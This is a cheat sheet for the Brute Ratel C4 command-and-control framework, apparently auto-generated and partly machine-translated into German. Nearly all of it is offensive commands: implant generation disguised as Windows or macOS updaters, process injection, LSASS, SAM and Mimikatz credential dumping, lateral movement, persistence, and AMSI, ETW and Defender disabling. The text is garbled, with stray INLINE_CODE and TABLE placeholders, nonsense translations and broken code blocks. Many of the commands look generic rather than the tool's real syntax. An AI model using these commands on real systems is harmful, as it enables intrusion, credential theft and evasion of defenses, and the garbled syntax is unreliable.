Brute Ratel C4 Framework Cheat Sheet¶
Im Überblick
Brute Ratel C4 (BRc4) ist ein kommerzielles kundenspezifisches Kommando und Control (C2)-Framework, das für rote Teamoperationen und adversäre Simulationen konzipiert ist. Es bietet erweiterte Evasions-Funktionen, ausgeklügelte Funktionen der Nachbenutzung und professionelle Betriebssicherheit.
ZEITSCHRIFTEN Warning: Dies ist ein kommerzielles Tool, das eine gültige Lizenz benötigt. Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
• Installation
Lizenzaktivierung¶
```bash
Activate license (requires valid license key)¶
./brc4 --activate
Verify license status¶
./brc4 --license-info
Update license¶
./brc4 --update-license ```_
Server Setup¶
```bash
Start BRc4 server¶
./brc4 --server
Start with custom configuration¶
./brc4 --server --config /path/to/config.json
Start with specific interface¶
./brc4 --server --interface 0.0.0.0 --port 443 ```_
Client Connection¶
```bash
Connect to server¶
./brc4 --client --server 192.168.1.100:443
Connect with authentication¶
./brc4 --client --server 192.168.1.100:443 --auth-token
Befehlsnummer
Serververwaltung_TABLE_61_________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________¶
Hörer Management |Command|Description| |---------|-------------| |INLINE_CODE_39|Create HTTP listener| |INLINE_CODE_40|Create HTTPS listener| |INLINE_CODE_41|Create DNS listener| |INLINE_CODE_42|Create TCP listener| |INLINE_CODE_43|Create SMB listener| |INLINE_CODE_44|Stop listener|
Badger (Agent) Management_¶
| Command | Description |
|---|---|
| INLINE_CODE_45 | Interact with badger |
| INLINE_CODE_46 | Kill badger |
| INLINE_CODE_47 | Set sleep interval |
| INLINE_CODE_48 | Set jitter percentage |
| INLINE_CODE_49 | Set proxy for badger |
In den Warenkorb
HTTP/HTTPS Listener¶
```bash
Create HTTPS listener¶
listener https set host 0.0.0.0 set port 443 set cert /path/to/cert.pem set key /path/to/key.pem set malleable /path/to/profile.profile start
Create HTTP listener with domain fronting¶
listener http set host 0.0.0.0 set port 80 set front-domain cdn.example.com set host-header legitimate-site.com start ```_
DNS Listener¶
```bash
Create DNS listener¶
listener dns set domain example.com set nameserver ns1.example.com set port 53 start ```_
SMB Listener¶
```bash
Create SMB listener¶
listener smb set pipename msagent_pipe set host 0.0.0.0 set port 445 start ```_
TCP Listener¶
```bash
Create TCP listener¶
listener tcp set host 0.0.0.0 set port 4444 set bind true start ```_
Badger Generation
Windows Badgers¶
```bash
Generate Windows executable¶
generate windows exe set listener https-443 set arch x64 set format exe set output windows_badger.exe generate
Generate Windows DLL¶
generate windows dll set listener https-443 set arch x64 set format dll set output windows_badger.dll generate
Generate Windows service¶
generate windows service set listener https-443 set arch x64 set service-name "WindowsUpdate" set output windows_service.exe generate ```_
Linux Badgers¶
```bash
Generate Linux ELF¶
generate linux elf set listener https-443 set arch x64 set format elf set output linux_badger generate
Generate Linux shared library¶
generate linux so set listener https-443 set arch x64 set format so set output linux_badger.so generate ```_
macOS Badgers¶
```bash
Generate macOS binary¶
generate macos macho set listener https-443 set arch x64 set format macho set output macos_badger generate
Generate macOS application¶
generate macos app set listener https-443 set arch x64 set app-name "Updater" set output macos_app.app generate ```_
Post-Exploitation Befehle
System Information¶
```bash
Get system information¶
sysinfo
Get current user¶
whoami
Get privileges¶
getprivs
Get environment variables¶
env
Get network interfaces¶
ifconfig ```_
Dateioperationen¶
```bash
List directory¶
ls /path/to/directory
Change directory¶
cd /path/to/directory
Download file¶
download /remote/path/file.txt
Upload file¶
upload /local/path/file.txt /remote/path/
Execute file¶
execute /path/to/executable
Delete file¶
rm /path/to/file ```_
Process Management¶
```bash
List processes¶
ps
Kill process¶
kill
Migrate to process¶
migrate
Inject into process¶
inject
Create process¶
spawn
Network Operations¶
```bash
Network connections¶
netstat
ARP table¶
arp
Routing table¶
route
Port scan¶
portscan 192.168.1.0/24 80,443,3389
Ping sweep¶
ping 192.168.1.0/24 ```_
Erweiterte Eigenschaften
Malleable C2 Profiles¶
```bash
Load malleable profile¶
set malleable /path/to/profile.profile
Custom HTTP profile¶
http-get \\{ set uri "/api/v1/status"; client \\{ header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"; header "Accept" "application/json"; \\} server \\{ header "Content-Type" "application/json"; output \\{ print; \\} \\} \\} ```_
Verfahrensinjektionstechniken¶
```bash
Classic DLL injection¶
inject-dll
Process hollowing¶
hollow
Reflective DLL loading¶
reflective-dll /path/to/dll.dll
Manual DLL mapping¶
map-dll
Thread hijacking¶
hijack-thread
Credential Harvesting¶
```bash
Dump LSASS¶
lsass-dump
Mimikatz integration¶
mimikatz sekurlsa::logonpasswords
SAM dump¶
sam-dump
LSA secrets¶
lsa-secrets
Cached credentials¶
cache-dump
Browser credentials¶
browser-creds ```_
Lateral Movement¶
```bash
WMI execution¶
wmi-exec 192.168.1.10 "whoami"
PSExec¶
psexec 192.168.1.10 "whoami"
SMB execution¶
smb-exec 192.168.1.10 "whoami"
DCOM execution¶
dcom-exec 192.168.1.10 "whoami"
WinRM execution¶
winrm-exec 192.168.1.10 "whoami" ```_
Persistence Mechanismen¶
```bash
Registry persistence¶
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
Scheduled task¶
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
Service persistence¶
persist-service "UpdateService" "C:\temp\badger.exe"
WMI persistence¶
persist-wmi "ProcessStart" "C:\temp\badger.exe"
Startup folder¶
persist-startup "C:\temp\badger.exe" ```_
Evasion Techniques
Anti-Analysis¶
```bash
VM detection¶
vm-detect
Sandbox evasion¶
sandbox-evasion
Debugger detection¶
debugger-detect
Sleep evasion¶
sleep-evasion 300
User interaction check¶
user-interaction ```_
AMSI/ETW Bypass¶
```bash
AMSI bypass¶
amsi-bypass
ETW bypass¶
etw-bypass
Disable Windows Defender¶
disable-defender
Unhook DLLs¶
unhook-dlls
Patch AMSI¶
patch-amsi ```_
Traffic Obfuscation¶
```bash
Domain fronting¶
set front-domain cdn.cloudflare.com set host-header legitimate-site.com
Custom User-Agent¶
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Custom headers¶
set headers "X-Forwarded-For: 192.168.1.100"
Proxy chains¶
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080" ```_
Payload Obfuscation¶
```bash
Encrypt payload¶
encrypt-payload aes256
Obfuscate strings¶
obfuscate-strings
Pack executable¶
pack-exe upx
Sign executable¶
sign-exe /path/to/cert.pfx
Polymorphic generation¶
polymorphic-gen ```_
Operationelle Sicherheit
Kommunikationssicherheit¶
```bash
Use encrypted channels¶
set encryption aes256
Certificate pinning¶
set cert-pinning true
Custom TLS configuration¶
set tls-version 1.3 set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
Jitter configuration¶
set jitter 20 set jitter-type random ```_
Infrastrukturmanagement¶
```bash
Redirector setup¶
set redirector nginx set upstream-server 192.168.1.100:443
Load balancing¶
set load-balancer round-robin set backend-servers "192.168.1.100,192.168.1.101"
Failover configuration¶
set failover-servers "backup1.com,backup2.com" ```_
Loggen und Monitoring¶
```bash
Enable detailed logging¶
set log-level debug set log-file /var/log/brc4.log
Operator tracking¶
set operator-logging true
Command auditing¶
set command-audit true
Session recording¶
set session-recording true ```_
Team Operations
Multi-Operator-Unterstützung¶
```bash
Add operator¶
operator add username password
Set operator permissions¶
operator permissions username read,write,execute
Operator sessions¶
operator sessions
Kick operator¶
operator kick username ```_
Collaboration Features¶
```bash
Share badger session¶
share-session
Session notes¶
note-add "Important finding"
note-list
note-delete
Team chat¶
chat "Message to team" chat-history ```_
Fehlerbehebung
Verbindungsprobleme¶
```bash
Test listener¶
test-listener
Check connectivity¶
test-connectivity
Verify certificates¶
verify-cert /path/to/cert.pem
Debug mode¶
set debug true ```_
Badger Issues¶
```bash
Badger health check¶
health-check
Reset badger¶
reset-badger
Badger diagnostics¶
diagnostics
Force reconnect¶
reconnect
Leistungsoptimierung¶
```bash
Optimize sleep intervals¶
set sleep-optimization true
Bandwidth throttling¶
set bandwidth-limit 1024
Connection pooling¶
set connection-pooling true
Compression¶
set compression gzip ```_
Konfiguration
Server Konfiguration¶
json
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 443,
"ssl": true,
"cert": "/path/to/cert.pem",
"key": "/path/to/key.pem"
\\\\},
"database": \\\\{
"type": "sqlite",
"path": "/opt/brc4/database.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "/var/log/brc4.log"
\\\\}
\\\\}_
Malleable Profil¶
```c
Custom malleable profile¶
set sample_name "Custom Profile"; set sleeptime "30000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get \\{ set uri "/api/status"; client \\{ header "Accept" "application/json"; header "Accept-Language" "en-US,en;q=0.9"; \\} server \\{ header "Content-Type" "application/json"; output \\{ print; \\} \\} \\} ```_
Ressourcen
- Brute Ratel C4 Offizielle Website_
- BRc4 Dokumentation
- Red Team Operations Guide_
- Malleable C2 Profiles
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Brute Ratel C4. Dies ist ein kommerzielles Werkzeug, das eine ordnungsgemäße Lizenzierung erfordert. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *